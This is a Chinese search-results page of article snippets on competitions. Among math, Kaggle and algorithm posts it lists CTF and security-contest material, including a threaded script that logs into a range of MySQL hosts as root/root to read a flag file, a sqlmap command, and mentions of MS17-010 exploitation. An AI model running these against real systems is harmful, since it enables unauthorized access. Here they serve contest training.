- 综合排序
- 最热优先
- 最新优先
- 来自专栏技术猫屋
2019 工业信息安全竞赛总结
0x00 前言 参加了今年的工控安全比赛,这个比赛分为线上赛(五场,每一场都可以参加,取最好成绩一场),线下复赛(前 60 名),线下决赛(复赛前三十名),我和两个同学组队,最后拿到了第三场线上第一,线下复赛第九 Base91魔改的数据如下: 至此了解了程序加密流程以及加密算法,但依然缺少SM4加密密钥和最终的密文,对apk进行res资源反混淆,发现如下图文件: 爆破解密脚本如下: data = "D4E8E5A0EBE5F9A0E9F3A0D9EFF5F2E5DFF6E5F2F9DFF3EDE1F2F4ACC3E9F0E8E5F2F4E5F8F4A0E3EFEEF3E9F3F4F3A0EFE6A0F4E8F2E5E5A0F0E1F2F4F3ACC3EFEDE5A0EFEEA1 解密结果为 接下来即使三部分密文的排列组合问题,必有一个字符串可以通过base91解密—>SM4解密-->base85解密得到正确flag(“Andr01dReMi3clsS0Ea5y!!! 组态异常分析 6.网络异常修复 7.Web应用应急修复 8.系统应急修复 9.工控应急修复 10.威胁情报收集 11.逆向分析溯源 12.网络安全加固 13.系统安全加固 14.应用安全加固 15.工控安全加固 这里也没啥好说的,基本上是通过 MS17-010打入一些主机后,插入旗帜,攻击工控设备,达到攻击效果等 0x14 总结 总的来说,这次的比赛还是很有收获,包括对一些协议的了解,工控设备的认知等,欢迎对工控安全有兴趣的小伙伴一起交流
79140编辑于 2023-01-03 - 来自专栏灰灰的数学与机械世界
非数竞赛专题三(5)
非数专题三 一元积分学 (5) 3.5 变限积分的应用 知识点:变限积分的几个公式 3.14 (南京大学1995年竞赛题) 求 \underset{x\rightarrow \infty}{\lim 3.15 (江苏省1998年竞赛题) 已知 g(x) 是以 T 为周期的连续函数,且 g(0)=1 , f(x)=\int_{0}^{2x}|x-t|g(t)dt ,求 f^{'}(T) . 3.16 (浙江省2002年竞赛题) 设 f(x) 连续,且当 x>-1 时,有 f(x)(\int_{0}^{x}f(t)dt+1)=\frac{xe^x}{2(1+x)^2} 求 f(x) .
61020编辑于 2022-11-23 - 来自专栏灰灰的数学与机械世界
竞赛好题暑假练习5
利用泰勒展开和级数性质求证一道积分不等式的问题 求证: \displaystyle \frac{5\pi}{2} < \int_{0}^{2\pi}e^{\sin x}dx < 2\pi e^{\frac ^2}\right]\end{align*} 进一步放缩一下,有 \displaystyle \frac{5\pi}{2}=2\pi\left(1+\frac{1}{4}\right) < \int_ \sin^3 x)dx=\frac{5\pi}{2} 再取 n=2m , n=1,2\dotsb ,根据式子 (1) 有当 k 是奇数, \displaystyle\int_{0}^{2\pi}\sin
60820编辑于 2022-11-23 - 来自专栏嵌入式视觉
【Kaggle竞赛】h5py库学习
这是2.9版本才有的功能) 2.3 2.3,组(Groups) 3 四,参考资料 最近在github上学习别人开源的一些Kaggle竞赛的源码,发现很多用到h5py和shutil这两个库,所以决定深入学习下这两个库的操作 (3)h5py h5py是对HDF5文件格式进行读写的python包,关于h5py更多介绍与安装,参考官方网站 。 二,h5py库学习 2.1,h5py库了解 h5py这个库是用于HDF5二进制数据格式的python接口,而HDF5是一种针对大量数据进行组织和存储的文件格式,它包含了数据模型,库和文件格式标准。 在python中处理HDF5文件依赖于h5py这个库,安装h5py包方法如下: conda install h5py # anconda3环境安装 pip install h5py # Python2 下面代码是创建HDF5文件的用法: import h5py f = h5py.File("mytestfile.hdf5", "w") # 在当前目录下会生成一个mytestfile.hdf5文件 文件名可以是字节字符串或
1.2K10编辑于 2022-09-05 网络安全技能竞赛之Web安全之综合渗透测试
Web安全之综合渗透测试 任务环境说明: 服务器场景名称:Web2003-2 服务器场景用户名:未知;密码:未知 通过url访问http://靶机/1,对该页面进行渗透测试,将完成后返回的结果内容作为flag } 通过url访问http://靶机/4,对该页面进行渗透测试,将完成后返回的结果内容作为flag提交 flag:flag{sqlinject1} 通过url访问http://靶机/5,
17710编辑于 2025-10-23- 来自专栏网站漏洞修补
CTF信息安全竞赛到底怎么去了解
下面我们对课程进行一个内容的讲解,在讲解之前我们首先来对ctf进行对应讲解,ctf是当前1种非常流行的信息安全竞赛形式,其英文名可翻译为夺得flag,也可翻译为夺旗赛。 咱本门课程面向的对象,定位在一个中等难度的程度上,需要咱们的学员具备一定基础,比如了解HTTP协议,以及会使用一些基本的,安全工具,其中就包括book、suit、circum,map以及metabolit 这样一些基本安全工具,当然对于课程中内容无论是想要入门的ctf小白或者是具备一定经验的ctf选手以及网络爱好者,都是一门不错的学习资料。 咱们课程内容涉及了这样几个方面,首先课程当中涉及了外部安全当中的多种漏洞以及ssh,FTP等服务的,漏洞咱们通过获得靶场机器的shell,但是该shell并不是root权限,那我们这时候就需要涉及到各种提权方式
42920编辑于 2022-03-02 - 来自专栏赤道企鹅的博客
大数据安全分析竞赛 物联网赛道writeup
os.listdir(chall_1_data_path) vxworks = {15, 21, 36, 37, 44, 45, 49} ecos = {4, 2, 30, 49, 18, 45, 33, 5, return "big" else: return "unknown" if __name__ == "__main__": #file_list = ["2", "5"
2.7K30编辑于 2022-12-27 - 来自专栏机器学习入门
挑战程序竞赛系列(94):3.6凸包(5)
挑战程序竞赛系列(94):3.6凸包(5) 传送门:POJ 2079: Triangle 题意: 求三个点构成的最大三角形面积。
78690发布于 2018-01-02 - 来自专栏灰灰的数学与机械世界
大学生非数竞赛专题四 (5)
非数专题四 多元函数积分学 (5) 4.5 曲线积分的计算 4.14 (江苏省2016年竞赛题) 设 \varGamma 为曲线 y=2^x+1 上从点 A(0,2) 到点 B(1,3) 的一段弧, L}xe^{-\sin y}dy-ye^{\sin x}dx ; (2) \displaystyle\oint_{L}xe^{\sin y}dy-ye^{-\sin x}dx \geq \dfrac{5} x^{2n}\geq 2+x^2 ,类推有 e^{\sin x}+e^{-\sin x} \geq 2+\sin^2 x =\dfrac{5}{2}-\dfrac{1}{2}\cos 2x ,根据积分保号性 sin y}dy-ye^{-\sin x}dx&=\pi\int_{0}^{\pi}(e^{\sin x}+e^{-\sin x})dx \\&\geq \pi\int_{0}^{\pi}(\frac{5} {2}-\frac{1}{2}\cos 2x)dx=\frac{5}{2}\pi^2\end{align*} 4.16 (江苏省2012年竞赛题) 已知 \varGamma 为 x^2+y^2+z^2
64020编辑于 2022-11-23 - 来自专栏嵌入式视觉
【Kaggle竞赛】h5py库快速入门
organization) 4 四,属性(Attributes) 5 五,参考资料 本文翻译自h5py官网,为了更适合国人阅读,内容有所整理和改动。 记住不要重复写入HDF5文件,否则会报错。 一,核心知识(Core concepts) h5py文件是存放两类对象的容器,数据集(dataset)和组(group)。 假设有人给你发送了一个HDF5文件,mmytestfile.hdf5。(如果想要自己创建HDF5文件,可阅读下文的附录:创建一个HDF5文件)。 对于学习使用HDF5文件,我们要做的第一件事当然是打开文件进行阅读了。 示例代码如下: import h5py f = h5py.File('mytestfile.hdf5','r') h5py文件对象(File object)的学习是我们开始的起点。
1.4K10编辑于 2022-09-05 全国职业院校技能竞赛网络安全竞赛数据取证与分析思路分析
请求的数量作为flag值提交; ip.src==192.168.181.25 && icmp //过滤来源及其协议 icmp.type == 8 //直接查询ping的request(请求包) 5. ICMP报文,找出类型为重定向的所有报文,将报文重定向的数量作为flag值提交; 筛选即可 netwox 86 -g 10.140.98.247 -i 10.140.98.254 icmp.type==5 5.使用Wireshark查看并分析Server4桌面下的capture.pcapng数据包文件,这些数据中有ssh报文,由于ssh有加密功能,现需要将这些加密报文的算法分析出来,将ssh服务器支持的第一个算法的密钥长度作为 有给seay的话,也可以试试分析 5.在任务计划中找到黑客所创建的任务计划(具有危险操作的任务计划),任务计划名为flag值提交。 iehistory 4.桌面上有一个flag文件,请获取flag文件中的内容; Volatility –f filename --profile=OS filescan | grep Desktop 5.
27710编辑于 2025-10-23- 来自专栏机器学习入门
挑战程序竞赛系列(5):2.1广度优先搜索
AOJ 0121: Seven Puzzle AOJ 0558: Cheese 翻译参考博文【AOJ 0558 Cheese 《挑战程序设计竞赛(第2版)》练习题答案】 在H * W的地图上有N个奶酪工厂 而未被击中的地方可以用INF表示这些区域相当安全。所以如果小文青能够跑到一个INF的地方,那么这就意味着他安全了。 distance[nx][ny] == INF){ distance[nx][ny] = step; //关键,表示安全了 AOJ 0121: Seven Puzzle 题目大意可参考博文【AOJ 0558 Cheese 《挑战程序设计竞赛(第2版)》练习题答案】 思路: 该题的特点在于4*2的方框固定,所以我们完全可以构造解空间 = new HashMap<>(); map.put("01234567", 0); char[][] init = {{'0','1','2','3'},{'4','5'
56640发布于 2019-05-26 网络安全竞赛——Windows服务漏洞扫描与利用
并将回显中必须要设置的选项名作为Flag值提交; 在上一题的基础上使用命令show options查看需要配置的参数内容,找出Required一栏中状态为yes且参数设置一栏中为空的参数名称 Flag:RHOSTS 5.
17810编辑于 2025-10-23全国职业院校技能大赛网络安全竞赛——Apache安全配置详解
Apache安全配置 任务环境说明: 服务器场景:A-Server 服务器场景操作系统: Linux 服务器用户名:root;密码:123456 打开服务器场景(A-Server),通过命令行清除防火墙规则
17610编辑于 2025-10-23网络安全竞赛C模块批量拿值脚本
def con(ip): try: con=MySQLdb.connect(host=ip,user='root',passwd='root') cur=con.cursor() sql="select load_file('/root/flagvalue.txt');" //flag存放位置 cur.execute(sql) re=cur.fetchall() print ip,re except Exception as er: print er def th(): for i in range(100,220): ip='172.16.%s.101' %i t=threading.Thread(target=con,args=(ip,)) t.start() th()
12510编辑于 2025-10-23- 来自专栏灰灰的数学与机械世界
大学生数学竞赛非数专题四(5)
专题四 多元函数积分学 (5) 4.5 曲线积分的计算 ---- 4.14 (江苏省2016年竞赛题) 设 \varGamma 为曲线 y=2^x+1 上从点 A(0,2) 到点 B(1,3) 的一段弧 {L}xe^{-\sin y}dy-ye^{\sin x}dx ;(2) \displaystyle\oint_{L}xe^{\sin y}dy-ye^{-\sin x}dx \geq \dfrac{5} x^{2n}\geq 2+x^2 ,类推有 e^{\sin x}+e^{-\sin x} \geq 2+\sin^2 x =\dfrac{5}{2}-\dfrac{1}{2}\cos 2x ,根据积分保号性 sin y}dy-ye^{-\sin x}dx&=\pi\int_{0}^{\pi}(e^{\sin x}+e^{-\sin x})dx \\&\geq \pi\int_{0}^{\pi}(\frac{5} {2}-\frac{1}{2}\cos 2x)dx=\frac{5}{2}\pi^2\end{align*} ---- 4.16 (江苏省2012年竞赛题) 已知 \varGamma 为 x^2+y^
64620编辑于 2022-11-14 网络安全竞赛—隐藏信息探索解析教程
登录成功后在成功的界面中找到FLAG并提交; Sqlmap一把梭,直接爆数据库获取账号密码 Sqlmap -u http://172.16.101.250/index.html --forms --level 5 利用Ctrl+A,可以发现在右下角有一颗星星能点击 点击下载一个test.zip文件,然后解压 提取出一个test文件,里面一个flag.png,然后查看flag.png Flag:UF71K2TW5JM88QZ8WMNTWKUY4
31610编辑于 2025-10-23- 来自专栏灰灰的数学与机械世界
大学生数学竞赛非数专题二(5)
专题二 一元微分学(5) 2.5 麦克劳林公式以及泰勒公式的应用 知识点: (1)假设函数 f(x) 在 x=a 的某一领域 U 內 (n+1) 接可导,则 \forall x \in U , f(x x^3+\dfrac{1}{5!}x^5+\dotsb+(-1)^{n}\dfrac{1}{(2n+1)!} \ln(1-x)=-x-\dfrac{1}{2}x^2-\dfrac{1}{3}x^3-\dotsb-\dfrac{1}{n}x^n+o(x^{n}) --- > 例2.25 (**江苏省2004年竞赛题 rightarrow \infty}{\lim}n(\frac{\pi}{n+1}+o(\frac{1}{n+1}))=\pm \pi\end{align*} ---- 例2.27 (莫斯科电子技术学院1997年竞赛题 {2t^3}\\&=\underset{t\rightarrow 0^+}{\lim}\dfrac{2t+o(t)}{2t^3}=+\infty\end{align*} 例2.29(北京市1999年竞赛题
55920编辑于 2022-11-23 - 来自专栏AIUAI
FashionAI 天池竞赛 - Top5 技术方案简汇
原文:FashionAI 天池竞赛 - Top5 技术方案简汇 - AIUAI 主页:http://fashionai.alibaba.com/ 服饰属性标签识别 - Top5-PPT 阿里天池关于服装属性标签识别的竞赛的 Top5 团队的技术方案 PPT 汇总. 可以在竞赛主页观看技术方案的答辩视频. ? 1. 禾思众成团队 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 2. JUST GAN 团队 ? ? ? ? 因此阿里巴巴在本次竞赛中提供了丰富的数据,从Attributes Recognition 角度去理解Fashion。 ? 5. SIAT-MMLAB-VIP 团队 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
1.8K30发布于 2019-02-27 - 来自专栏绿盟科技研究通讯
解析5G安全(二):5G安全需求
随着5G的快速建设,5G的安全问题亟待解决。解决5G的安全问题,首先要明确5G的安全需求。 1.2 三大场景对终端的安全需求 除了终端基本的安全需求外,在5G中讨论终端安全需求不能脱离垂直应用场景。5G承载着千行万业的垂直应用,如车联网、工业物联网等。 在明确了5G的安全需求后,下一篇文章我们将对这些安全需求提出相应的安全举措,同时提出一种面向切片服务的多级协同安全防护机制,希望为5G安全防护提供一个新的视角。 5G安全是机遇也是挑战,让我们拥抱5G安全,共同守护5G的美好未来。 参考文献: [1].Rupprecht D , Kohls K , Holz T , et al. 5G移动通信网络安全研究[J].
8.5K22发布于 2019-12-11
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号